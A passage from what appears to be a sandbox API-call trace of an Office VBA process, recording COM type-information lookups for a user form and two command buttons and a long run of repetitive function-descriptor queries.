(in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommandButton1", cchWideChar=15, lpMultiByteStr=0x184670, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommandButton1", lpUsedDefaultChar=0x0) returned 15 [0041.961] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CommandButton1") returned 0x10d47c [0041.961] ITypeInfo:GetRefTypeInfo (in: This=0x6a6e948, hreftype=0x500003d, ppTInfo=0x184790 | out: ppTInfo=0x184790*=0x6cef178) returned 0x0 [0041.961] ITypeInfo:RemoteGetTypeAttr (in: This=0x6cef178, ppTypeAttr=0x1846f0, pDummy=0x2aa | out: ppTypeAttr=0x1846f0, pDummy=0x2aa) returned 0x0 [0041.961] ITypeInfo:LocalReleaseTypeAttr (This=0x6cef178) returned 0x0 [0041.961] ITypeInfo:GetImplTypeFlags (in: This=0x6cef178, index=0x0, pImplTypeFlags=0x1846d8 | out: pImplTypeFlags=0x1846d8*=1) returned 0x0 [0041.961] ITypeInfo:GetRefTypeOfImplType (in: This=0x6cef178, index=0x0, pRefType=0x1846e0 | out: pRefType=0x1846e0*=0x2100) returned 0x0 [0041.961] ITypeInfo:GetRefTypeInfo (in: This=0x6cef178, hreftype=0x2100, ppTInfo=0x1846e8 | out: ppTInfo=0x1846e8*=0x6cef1d0) returned 0x0 [0041.961] IUnknown:Release (This=0x6cef1d0) returned 0x0 [0041.961] ITypeInfo:GetImplTypeFlags (in: This=0x6cef178, index=0x1, pImplTypeFlags=0x1846d8 | out: pImplTypeFlags=0x1846d8*=3) returned 0x0 [0041.961] ITypeInfo:GetRefTypeOfImplType (in: This=0x6cef178, index=0x1, pRefType=0x1846e0 | out: pRefType=0x1846e0*=0x2900) returned 0x0 [0041.961] ITypeInfo:GetRefTypeInfo (in: This=0x6cef178, hreftype=0x2900, ppTInfo=0x1846e8 | out: ppTInfo=0x1846e8*=0x6cef280) returned 0x0 [0041.962] IUnknown:QueryInterface (in: This=0x6cef280, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x184610 | out: ppvObject=0x184610*=0x0) returned 0x80004002 [0041.962] ITypeInfo:RemoteGetTypeAttr (in: This=0x6cef280, ppTypeAttr=0x184638, pDummy=0x10 | out: ppTypeAttr=0x184638, pDummy=0x10) returned 0x0 [0041.962] ITypeInfo:LocalReleaseTypeAttr (This=0x6cef280) returned 0x0 [0041.962] IMalloc:Realloc (This=0x7feffc15380, pv=0x6d10430, cb=0x272) returned 0x6cc0790 [0041.962] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x6c, ppFuncDesc=0x184778, pDummy=0x138 | out: ppFuncDesc=0x184778, pDummy=0x138) returned 0x0 [0041.962] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.962] ITypeInfo:RemoteGetDocumentation (in: This=0x6a6e948, memid=2012, refPtrFlags=0x1847b8, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0041.962] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommandButton2", cchWideChar=15, lpMultiByteStr=0x184670, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommandButton2", lpUsedDefaultChar=0x0) returned 15 [0041.962] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CommandButton2") returned 0x10d47d [0041.962] ITypeInfo:GetRefTypeInfo (in: This=0x6a6e948, hreftype=0x500003d, ppTInfo=0x184790 | out: ppTInfo=0x184790*=0x6cef178) returned 0x0 [0041.962] ITypeInfo:RemoteGetTypeAttr (in: This=0x6cef178, ppTypeAttr=0x1846f0, pDummy=0x2ac | out: ppTypeAttr=0x1846f0, pDummy=0x2ac) returned 0x0 [0041.962] ITypeInfo:LocalReleaseTypeAttr (This=0x6cef178) returned 0x0 [0041.962] ITypeInfo:GetImplTypeFlags (in: This=0x6cef178, index=0x0, pImplTypeFlags=0x1846d8 | out: pImplTypeFlags=0x1846d8*=1) returned 0x0 [0041.962] ITypeInfo:GetRefTypeOfImplType (in: This=0x6cef178, index=0x0, pRefType=0x1846e0 | out: pRefType=0x1846e0*=0x2100) returned 0x0 [0041.962] ITypeInfo:GetRefTypeInfo (in: This=0x6cef178, hreftype=0x2100, ppTInfo=0x1846e8 | out: ppTInfo=0x1846e8*=0x6cef1d0) returned 0x0 [0041.962] IUnknown:Release (This=0x6cef1d0) returned 0x0 [0041.962] ITypeInfo:GetImplTypeFlags (in: This=0x6cef178, index=0x1, pImplTypeFlags=0x1846d8 | out: pImplTypeFlags=0x1846d8*=3) returned 0x0 [0041.962] ITypeInfo:GetRefTypeOfImplType (in: This=0x6cef178, index=0x1, pRefType=0x1846e0 | out: pRefType=0x1846e0*=0x2900) returned 0x0 [0041.962] ITypeInfo:GetRefTypeInfo (in: This=0x6cef178, hreftype=0x2900, ppTInfo=0x1846e8 | out: ppTInfo=0x1846e8*=0x6cef280) returned 0x0 [0041.962] IUnknown:QueryInterface (in: This=0x6cef280, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x184610 | out: ppvObject=0x184610*=0x0) returned 0x80004002 [0041.962] ITypeInfo:RemoteGetTypeAttr (in: This=0x6cef280, ppTypeAttr=0x184638, pDummy=0x10 | out: ppTypeAttr=0x184638, pDummy=0x10) returned 0x0 [0041.962] ITypeInfo:LocalReleaseTypeAttr (This=0x6cef280) returned 0x0 [0041.962] IMalloc:Realloc (This=0x7feffc15380, pv=0x6cc0790, cb=0x2a2) returned 0x6cb78c0 [0041.962] IUnknown:QueryInterface (in: This=0x6a6e9a8, riid=0x7fee45d40f0*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x184798 | out: ppvObject=0x184798*=0x6a6e9a8) returned 0x0 [0041.962] ITypeInfo2:GetCustData (in: This=0x6a6e9a8, GUID=0x7fee45dd970*(Data1=0xba65d790, Data2=0x9301, Data3=0x11cf, Data4=([0]=0x8d, [1]=0x22, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x37, [6]=0x53, [7]=0x84)), pVarVal=0x1847a8 | out: pVarVal=0x1847a8*(varType=0x0, wReserved1=0x0, wReserved2=0x6c, wReserved3=0x0, varVal1=0x2ac00000000, varVal2=0x6884738)) returned 0x0 [0041.962] IUnknown:Release (This=0x6a6e9a8) returned 0x3 [0041.962] ITypeInfo:RemoteGetDocumentation (in: This=0x6a6e9a8, memid=-1, refPtrFlags=0x1847a0, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x500003d | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x500003d) returned 0x0 [0041.962] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="UserForm", cchWideChar=9, lpMultiByteStr=0x1846b0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UserForm", lpUsedDefaultChar=0x0) returned 9 [0041.962] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UserForm") returned 0x10044e [0041.962] IUnknown:QueryInterface (in: This=0x6ccf078, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x184750 | out: ppvObject=0x184750*=0x0) returned 0x80004002 [0041.962] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ccf078, ppTypeAttr=0x184778, pDummy=0x10 | out: ppTypeAttr=0x184778, pDummy=0x10) returned 0x0 [0041.962] ITypeInfo:LocalReleaseTypeAttr (This=0x6ccf078) returned 0x0 [0041.963] IMalloc:Realloc (This=0x7feffc15380, pv=0x6cb78c0, cb=0x304) returned 0x6d19220 [0041.963] _ultow_s (in: _Value=0x5de83299, _Buffer=0x6c68fcc, _BufferCount=0x9, _Radix=16 | out: _Buffer="5de83299") returned 0x0 [0041.963] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="095de83299", cchWideChar=11, lpMultiByteStr=0x184a00, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="095de83299", lpUsedDefaultChar=0x0) returned 11 [0041.963] ITypeInfo:RemoteGetTypeAttr (in: This=0x6a6e948, ppTypeAttr=0x184a58, pDummy=0x69d6b10 | out: ppTypeAttr=0x184a58, pDummy=0x69d6b10*=0x69d0007) returned 0x0 [0041.963] ITypeInfo:GetRefTypeOfImplType (in: This=0x6a6e948, index=0xffffffff, pRefType=0x184a64 | out: pRefType=0x184a64*=0xfffffffe) returned 0x0 [0041.963] ITypeInfo:GetRefTypeInfo (in: This=0x6a6e948, hreftype=0xfffffffe, ppTInfo=0x184a70 | out: ppTInfo=0x184a70*=0x6a6e8e8) returned 0x0 [0041.963] ITypeInfo:LocalReleaseTypeAttr (This=0x6a6e948) returned 0x0 [0041.963] IUnknown:Release (This=0x6a6e948) returned 0x4 [0041.963] ITypeInfo:RemoteGetTypeAttr (in: This=0x6a6e8e8, ppTypeAttr=0x184a58, pDummy=0x6 | out: ppTypeAttr=0x184a58, pDummy=0x6) returned 0x0 [0041.963] ITypeInfo:RemoteGetTypeAttr (in: This=0x6a6e8e8, ppTypeAttr=0x184a00, pDummy=0x6 | out: ppTypeAttr=0x184a00, pDummy=0x6) returned 0x0 [0041.963] ITypeInfo:LocalReleaseTypeAttr (This=0x6a6e8e8) returned 0x0 [0041.963] ITypeInfo:LocalReleaseTypeAttr (This=0x6a6e8e8) returned 0x0 [0041.963] IUnknown:Release (This=0x6a6e8e8) returned 0x3 [0041.963] IMalloc:Realloc (This=0x7feffc15380, pv=0x68e9e20, cb=0x40) returned 0x6b872f0 [0041.963] IMalloc:Realloc (This=0x7feffc15380, pv=0x68e9df0, cb=0x50) returned 0x6ccfdf0 [0041.963] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UserForm1") returned 0x10d629 [0041.963] IUnknown:QueryInterface (in: This=0x6a6e9a8, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x184600 | out: ppvObject=0x184600*=0x0) returned 0x80004002 [0041.963] IUnknown:QueryInterface (in: This=0x6a6e9a8, riid=0x7fee45d40f0*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x184548 | out: ppvObject=0x184548*=0x6a6e9a8) returned 0x0 [0041.963] ITypeInfo2:GetCustData (in: This=0x6a6e9a8, GUID=0x7fee45dd970*(Data1=0xba65d790, Data2=0x9301, Data3=0x11cf, Data4=([0]=0x8d, [1]=0x22, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x37, [6]=0x53, [7]=0x84)), pVarVal=0x184558 | out: pVarVal=0x184558*(varType=0x0, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x800000000)) returned 0x0 [0041.963] IUnknown:Release (This=0x6a6e9a8) returned 0x3 [0041.963] ITypeInfo:RemoteGetDocumentation (in: This=0x6a6e9a8, memid=-1, refPtrFlags=0x184550, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x184570 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x184570*="") returned 0x0 [0041.963] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="UserForm", cchWideChar=9, lpMultiByteStr=0x184460, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UserForm", lpUsedDefaultChar=0x0) returned 9 [0041.963] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UserForm") returned 0x10044e [0041.963] ITypeInfo:RemoteGetTypeAttr (in: This=0x6a6e948, ppTypeAttr=0x184550, pDummy=0x0 | out: ppTypeAttr=0x184550, pDummy=0x0) returned 0x0 [0041.963] ITypeInfo:LocalReleaseTypeAttr (This=0x6a6e948) returned 0x0 [0041.963] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x0, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.963] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.963] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x1, ppFuncDesc=0x184528, pDummy=0x70 | out: ppFuncDesc=0x184528, pDummy=0x70) returned 0x0 [0041.964] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.964] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x2, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.964] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.964] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x3, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.964] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.964] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x4, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.964] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.964] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x5, ppFuncDesc=0x184528, pDummy=0x70 | out: ppFuncDesc=0x184528, pDummy=0x70) returned 0x0 [0041.964] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.964] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x6, ppFuncDesc=0x184528, pDummy=0x140 | out: ppFuncDesc=0x184528, pDummy=0x140) returned 0x0 [0041.964] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.964] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x7, ppFuncDesc=0x184528, pDummy=0x140 | out: ppFuncDesc=0x184528, pDummy=0x140) returned 0x0 [0041.964] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.964] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x8, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.964] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.964] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x9, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.964] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.964] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0xa, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.964] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.964] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0xb, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.964] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.964] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0xc, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.964] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.964] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0xd, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.964] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.964] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0xe, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.964] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.964] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0xf, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.964] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.964] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x10, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.964] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.964] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x11, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.964] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.964] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x12, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.964] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.964] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x13, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.964] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.964] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x14, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.964] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.964] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x15, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.964] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.964] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x16, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.964] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.964] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x17, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.964] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.964] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x18, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.964] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.965] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x19, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.965] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.965] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x1a, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.965] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.965] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x1b, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.965] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.965] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x1c, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.965] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.965] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x1d, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.965] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.965] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x1e, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.965] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.965] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x1f, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.965] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.965] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x20, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.965] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.965] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x21, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.965] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.965] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x22, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.965] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.965] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x23, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.965] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.965] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x24, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.965] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.965] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x25, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.965] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.965] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x26, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.965] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.965] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x27, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.965] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.965] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x28, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.965] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.965] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x29, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.965] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.965] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x2a, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.965] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.965] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x2b, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.965] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.965] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x2c, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.965] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.965] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x2d, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.965] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.965] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x2e, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.965] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.965] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x2f, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.965] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.965] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x30, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.965] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.966] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x31, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.966] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.966] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x32, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.966] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.966] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x33, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.966] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.966] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x34, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.966] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.966] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x35, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.966] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.966] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x36, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.966] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.966] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x37, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.966] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.966] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x38, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 